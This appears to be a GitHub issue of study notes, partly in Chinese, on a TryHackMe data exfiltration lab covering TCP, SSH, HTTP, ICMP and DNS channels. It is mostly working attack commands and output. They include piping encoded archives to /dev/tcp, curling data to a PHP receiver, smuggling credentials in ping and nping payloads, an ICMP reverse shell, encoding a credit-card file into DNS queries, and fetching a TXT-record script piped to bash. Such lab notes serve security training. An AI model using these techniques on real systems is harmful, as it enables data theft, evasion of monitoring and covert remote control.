Open WDavid404 opened 7 months ago
If we are in a well-secured environment, then this kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on non-standard protocols.
Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits of this technique is that it encodes the data during transmission and makes it harder to examine.
The diagram shows that two hosts communicate over TCP on port 1337.
Steps:
thm@jump-box$ nc -lvp 8080 > /tmp/task4-creds.data
root@AttackBox$ ssh thm@MACHINE_IP -p 2022
thm@victim1:$ tar zcf - <target dir>/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
thm@jump-box:/tmp/$ dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
To transfer data over the SSH, we can use either the Secure Copy Protocol SCP or the SSH client.
In the case that we cannot use SCP, we will focus more on the SSH client.
E.g. Exfiltration data from the victim1 machine
thm@victim1:$ tar cf - <dir>/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
SSH clients provide a way to execute a single command without having a full session "cd /tmp/; tar xpf - ", which is to change the directory and unarchive the passed file on the jump machine.
思路: 1,在attacker server上搭建一个http或https的web server,它会处理过来的data request。 比如contact.php文件会把接收到的data保存为一个 tmp目录下的http.bs64 文件
<?php
if (isset($_POST['file'])) {
$file = fopen("/tmp/http.bs64","w");
fwrite($file, $_POST['file']);
fclose($file);
}
?>
2,在Victim machine上执行
thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
thm@web:~$ sudo sed -i 's/ /+/g' /tmp/http.bs64
then,decode the file
thm@web:~$ cat /tmp/http.bs64 | base64 -d | tar xvfz - tmp/task6/
Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via the HTTP protocol. HTTP tunneling sends and receives many HTTP requests depending on the communication channel!
Case:
For HTTP Tunneling, we will be using a Neo-reGeorg tool to establish a communication channel to access the internal network devices.
root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py generate -k thm
The previous command generates encrypted Tunneling clients with thm key in the neoreg_servers/ directory.
Note that there are various extensions available, including PHP, ASPX, JSP, etc.
In our scenario, we will be uploading the tunnel.php file via the uploader machine.
Once we have uploaded the file, we can access it on the following URL: http://MACHINE_IP/uploader/files/tunnel.php
.
root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py -k thm -u http://MACHINE_IP/uploader/files/tunnel.php
Once it is connected to the tunneling client, we are ready to use the tunnel connection as a proxy binds on our local machine, 127.0.0.1, on port 1080.
For example, if we want to access the app.thm.com, which has an internal IP address 172.20.0.121 on port 80, we can use the curl command with --socks5 argument. We can also use other proxy applications, such as ProxyChains, FoxyProxy, etc., to communicate with the internal network.
root@AttackBox:~$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Welcome to APP Server!
On a high level, the ICMP packet's structure contains a Data section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the Data section, which is optional to use.
Note that the Data field is optional and could either be empty or it could contain a random string during the communications. As an attacker, we can use the ICMP structure to include our data within the Data section and send it via ICMP packet to another machine.
With the -p argument, we can specify 16 bytes of data in hex representation to send through the packet. Note that the -p option is only available for Linux operating systems.
Need to convert it to its Hex representation and then pass it to the ping command using -p options as follows:
root@AttackBox$ echo "thm:tryhackme" | xxd -p
74686d3a7472796861636b6d650a
//xxd command to convert our string to Hex
Then we can use the ping command with the Hex value we got from converting the thm:tryhackme.
root@AttackBox$ ping MACHINE_IP -c 1 -p 74686d3a7472796861636b6d650a
The Metasploit framework uses the same technique explained in the previous section.
However, it will capture incoming ICMP packets and wait for a Beginning of File (BOF) trigger value.
Once it is received, it writes to the disk until it gets an End of File (EOF) trigger value.
The following diagram shows the required steps for the Metasploit framework. Since we need the Metasploit Framework for this technique, then we need the AttackBox machine to perform this attack successfully.
step1:
msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src ATTACKBOX_IP
BPF_FILTER => icmp and not src ATTACKBOX_IP
msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > run
[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
step2: ssh to then victim machine and use "nping" tool
thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin1:password1"
Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2022-04-25 23:23 EEST
SENT (0.0369s) ICMP [192.168.0.121 > ATTACKBOX_IP Echo request (type=8/code=0) id=7785 seq=1] IP [ttl=64 id=40595 iplen=39 ]
RCVD (0.0376s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=63 id=12656 iplen=39 ]
RCVD (0.0755s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=31 id=60759 iplen=32 ]
Max rtt: 38.577ms | Min rtt: 0.636ms | Avg rtt: 19.606ms
Raw packets sent: 1 (39B) | Rcvd: 2 (71B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
If everything is set correctly, the Metasploit framework should identify the trigger value and wait for the data to be written to disk. Let's start sending the required data and the end of the file trigger value from the ICMP machine.
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"
we will show executing commands over the ICMP protocol using the ICMPDoor tool. ICMPDoor is an open-source reverse-shell written in Python3 and scapy. The tool uses the same concept we discussed earlier in this task, where an attacker utilizes the Data section within the ICMP packet. The only difference is that an attacker sends a command that needs to be executed on a victim's machine. Once the command is executed, a victim machine sends the execution output within the ICMP packet in the Data section.
We needed for C2 communication over the ICMP protocol on JumpBox and the ICMP-Host machines.
thm@icmp-host:~$ sudo icmpdoor -i eth0 -d 192.168.0.133
thm@jump-box$ sudo icmp-cnc -i eth1 -d 192.168.0.121
shell: hostname
hostname
shell: icmp-host
[*]we requested to execute the hostname command, and we received icmp-host (hostname命令在victim machine上的执行结果)
Since DNS is not a transport protocol, many organizations don't regularly monitor the DNS protocol! The DNS protocol is allowed in almost all firewalls in any organization network. For those reasons, threat actors prefer using the DNS protocol to hide their communications.
The DNS protocol has limitations that need to be taken into consideration, which are as follows,
Based on these limitations, we can use a limited number of characters to transfer data over the domain name. If we have a large file, 10 MB for example, it may need more than 50000 DNS requests to transfer the file completely. Therefore, it will be noisy traffic and easy to notice and detect.
There are many use case scenarios, but the typical one is when the firewall blocks and filters all traffic. We can pass data or TCP/UDP packets through a firewall using the DNS protocol, but it is important to ensure that the DNS is allowed and resolving domain names to IP addresses.
Note:we must keep the whole URL under 255 characters, and each subdomain label can't exceed 63 characters.
thm@victim2:~$ cat task9/credit.txt | base64 | tr -d "\n"| fold -w18 | sed -r 's/.*/&.att.tunnel.com/'
TmFtZTogVEhNLXVzZX.att.tunnel.com
IKQWRkcmVzczogMTIz.att.tunnel.com
NCBJbnRlcm5ldCwgVE.att.tunnel.com
hNCkNyZWRpdCBDYXJk.att.tunnel.com
OiAxMjM0LTEyMzQtMT.att.tunnel.com
IzNC0xMjM0CkV4cGly.att.tunnel.com
ZTogMDUvMDUvMjAyMg.att.tunnel.com
pDb2RlOiAxMzM3Cg==.att.tunnel.com
[*] tr: 替换指定的字符;或者删除指定的字符(需要-d option)
[*] fold: 把文件按照指定的幅度进行换行
[*] sed -r 正规表达式
Another way: This time, we split every 18 characters with a dot "." and add the name server, then use the dig command to send it over the DNS
thm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash
C2 frameworks use the DNS protocol for communication, such as sending a command execution request and receiving execution results over the DNS protocol. They also use the TXT DNS record to run a dropper to download extra files on a victim machine. This section simulates how to execute a bash script over the DNS protocol. We will be using the web interface to add a TXT DNS record to the tunnel.com domain name.
思路:把一个script脚本(encode处理过)放在TXT DNS record里,然后让victim machine去用dig命令访问domain从而获得script内容(当然对得到的script内容进行字符处理和decode)
thm@victim2$ dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash
Steps:
https://code.kryo.se/iodine/ iodine lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firewalled, but DNS queries are allowed.
数据渗漏,数据泄漏(Data Exfiltration)
How to use Data Exfiltration
There are three primary use case scenarios of data exfiltration, including: